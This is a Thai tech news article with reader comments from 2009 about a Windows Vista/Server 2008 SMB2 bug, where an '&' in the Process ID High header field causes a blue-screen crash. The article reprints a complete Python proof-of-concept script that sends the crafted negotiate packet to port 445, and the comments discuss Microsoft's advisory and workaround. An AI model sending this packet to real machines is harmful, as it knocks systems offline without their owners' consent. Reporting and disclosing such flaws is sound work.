Tags:
Node Thumbnail

พบบั๊กในไฟล์ SMB2.SYS ซึ่งเป็นไฟล์ที่ใช้สำหรับโพรโตคอลแชร์ไฟล์ SMB2 ส่งผลถึงระบบปฎิบัติการของไมโครซอฟท์นับแต่วิสต้าเป็นต้นมาเสี่ยงต่อการถูกยิงจากเครื่องในเครือข่ายจนทำให้ระบบล่ม

ลงลึกไปกว่านั้น บั๊กนี้พบในส่วนของการเจรจาเพื่อเปิดการเชื่อมต่อ SMB โดยในฟิลด์ Process ID High นั้นหากมีอักขระ "&" เข้าไปก็จะทำให้ระบบในส่วนนี้ล้มเหลวจนพาทั้งระบบปฎิบัติการล่มและนำไปสู่ "จอฟ้า" ในที่สุด

คาดว่าทุกเครื่องที่เปิดการทำงานของโพรโตคอล SMB2 ไว้จะเสี่ยงต่อบั๊กนี้ทั้งหมด อย่างไรก็ตามยังไม่มีการรายงานว่าบั๊กนี้ส่งผลถึง Windows Server 2008 แน่หรือไม่

โพรโตคอล SMB2 มักใช้ในเครือข่าย LAN เป็นหลัก ดังนั้นบั๊กนี้อาจจะไม่น่ากลัวมากเท่าที่คิด แต่หากสอบๆ อยู่แล้วเพื่อนโต๊ะข้างๆ ยิงจอฟ้าทั้งวันคงไม่สนุกเหมือนกัน

ตัวอย่างโค้ดอยู่หลัง break

ที่มา - seclists.org

!/usr/bin/python

When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a

PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"

)
s = socket()

s.connect(host)
s.send(buff)
s.close()

Get latest news from Blognone

Comments

By: ck4u
iPhoneWindows PhoneBlackberrySymbian
on 9 September 2009 - 00:17 #123489

บรรทัดแรก "แชร์ไฟล์" นะครับ ไม่ใช่ "แชร์ไหล์ "

By: lew
FounderJusci's WriterMEconomicsAndroid
on 9 September 2009 - 00:18 #123490 Reply to:123489
lew's picture

แก้เรียบร้อยครับ

LewCPE


lewcpe.com, @public_lewcpe

By: Zerothman
WriteriPhoneIn Love
on 9 September 2009 - 00:44 #123494

เวลาอ่านที่มี "xxx อยู่หลังเบรก" แล้วให้อารมณ์ดูรายการทีวี

"...และพบกับโค้ดหลังเบรก ครู่เดียวครับ!" แล้วตัดเข้าโฆษณา

By: magicbank on 9 September 2009 - 11:00 #123537 Reply to:123494

เดี๋ยวได้เล่นมุข

พักสักครู่ แล้วกลับมาชมกันต่อหลังเบรกครับ

By: Architec
ContributorWindows PhoneAndroidWindows
on 9 September 2009 - 01:42 #123505

ปกติ Conflicker มันก็ใส่มาทั้งชุดอยู่แล้วนิ ทั้ง 139,445 ถ้ามันฝังไวรัสไม่ได้มันก็ DDoS เอา เลยโดนพักเบรกสักครู่ แล้วกลับมาชมกันต่อ - -*
สุดท้ายก็เลยปิดพอร์ตทั้งสองนี่ซะ หมดปัญหาไปพักใหญ่ๆ

By: tekkasit
ContributorAndroidWindowsIn Love
on 9 September 2009 - 07:50 #123518
tekkasit's picture

ถูงยิง -> ถูกยิง

By: Pinery
ContributoriPhoneAndroidIn Love
on 9 September 2009 - 10:07 #123531

"อาจะไม่น่ากลัว" -> "อาจจะไม่น่ากลัว"ครับ :)

By: nuntawat
WriterAndroidWindowsIn Love
on 9 September 2009 - 11:56 #123545
nuntawat's picture

ไมโครซอฟท์ออกวิธีการแก้ไขเฉพาะหน้า (workaround) แล้ว ดูได้ที่นี่

ที่มา: Microsoft Security Advisory (975497) ผ่าน Ars Technica

Windows 7 Professional on my ThinkPad T61 is very stable!

By: wiennat
Writer
on 9 September 2009 - 12:13 #123550

โค้ดเหมือนจะผิดนะครับ

from socket import socket 

น่าจะอยู่อีกบรรทัดนึง

onedd.net


onedd.net

By: lew
FounderJusci's WriterMEconomicsAndroid
on 10 September 2009 - 08:25 #123762 Reply to:123550
lew's picture

แก้แล้วนะครับ

LewCPE


lewcpe.com, @public_lewcpe

By: hisoft
ContributorWindows PhoneWindows
on 10 September 2009 - 01:03 #123672
hisoft's picture

Affected Software
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2

Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2

Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2

Non-Affected Software
Microsoft Windows 2000 Service Pack 4

Windows XP Service Pack 2 and Windows XP Service Pack 3

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 with SP2 for Itanium-based Systems

Windows 7 for 32-bit Systems

Windows 7 for x64-based Systems

Windows Server 2008 R2 for x64-based Systems

Windows Server 2008 R2 for Itanium-based Systems

ถ้าตามนี้ เหมือน Windows 7 จะรอดอยู่แล้วนะครับ

The Phantom Thief

By: lew
FounderJusci's WriterMEconomicsAndroid
on 10 September 2009 - 08:26 #123763 Reply to:123672
lew's picture

อันนี้คือจากไหนหรือครับ

แต่ก็มี win 7 ในรายการนะ

LewCPE


lewcpe.com, @public_lewcpe

By: hisoft
ContributorWindows PhoneWindows
on 13 September 2009 - 01:28 #124625 Reply to:123763
hisoft's picture

มาจากคุณ nuntawat ด้านบนเนี้ยครับ >> http://www.microsoft.com/technet/security/advisory/975497.mspx

ส่วนที่มี 7 ด้วยนี่คือผมแบ่งบรรทัดผิดเอง ก็อบมาแล้วไม่ได้ตรวจก่อนทำให้อ่านแล้วคลาดเคลื่อนในความหมายได้ ต้องขออภัยด้วยครับ ที่จริงเป็นแบบนี้

Affected Software (ได้รับผลกระทบ)
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2

Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2

Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
 

Non-Affected Software (ไม่กระทบ)
Microsoft Windows 2000 Service Pack 4

Windows XP Service Pack 2 and Windows XP Service Pack 3

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 with SP2 for Itanium-based Systems

Windows 7 for 32-bit Systems

Windows 7 for x64-based Systems

Windows Server 2008 R2 for x64-based Systems

Windows Server 2008 R2 for Itanium-based Systems

 

The Phantom Thief

By: tomyum
ContributorAndroidWindows
on 10 September 2009 - 01:41 #123689
tomyum's picture

แอบเปิดเผยบั๊กแล้วล่อให้ย้ายไป 7 นี่ฟว่า
ลง XP ใหม่แล้วต้องมาคอยแพทซ์ไอ้ตัวนี้ไม่หนุกนา

\(@^_^@)/

M R T O M Y U M